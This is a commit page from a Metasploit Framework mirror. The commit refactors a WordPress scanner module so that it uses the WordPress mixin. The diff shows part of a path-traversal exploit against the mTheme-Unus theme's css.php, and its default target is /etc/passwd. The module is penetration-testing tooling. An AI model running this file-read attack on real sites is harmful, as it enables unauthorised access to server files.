infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Included Wordpress mixin.

bug/bundler_fix
Roberto Soares 2015-04-16 05:02:39 -03:00
parent 0031f09d60
commit c8e1185a04
1 changed files with 2 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

5
modules/auxiliary/scanner/http/wp_mobileedition_file_read.rb
View File

@ -9,6 +9,7 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Report include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
include Msf::HTTP::Wordpress
include Msf::Auxiliary::Scanner include Msf::Auxiliary::Scanner
def initialize(info = {}) def initialize(info = {})
@ -34,8 +35,6 @@ class Metasploit3 < Msf::Auxiliary
register_options( register_options(
[ [
Opt::RPORT(80),
OptString.new('TARGETURI', [ true, "The URI path to the web application", "/wordpress/"]),
OptString.new('FILEPATH', [true, "The path to the file to read", "/etc/passwd"]), OptString.new('FILEPATH', [true, "The path to the file to read", "/etc/passwd"]),
OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 6 ]) OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 6 ])
], self.class) ], self.class)
@ -48,7 +47,7 @@ class Metasploit3 < Msf::Auxiliary
res = send_request_cgi({ res = send_request_cgi({
'method' => 'GET', 'method' => 'GET',
'uri' => normalize_uri(datastore['TARGETURI'], 'wp-content', 'themes', 'mTheme-Unus', 'css', 'css.php'), 'uri' => normalize_uri(wordpress_url_themes, 'mTheme-Unus', 'css', 'css.php'),
'vars_get' => 'vars_get' =>
{ {
'files' => "#{traversal}#{filename}" 'files' => "#{traversal}#{filename}"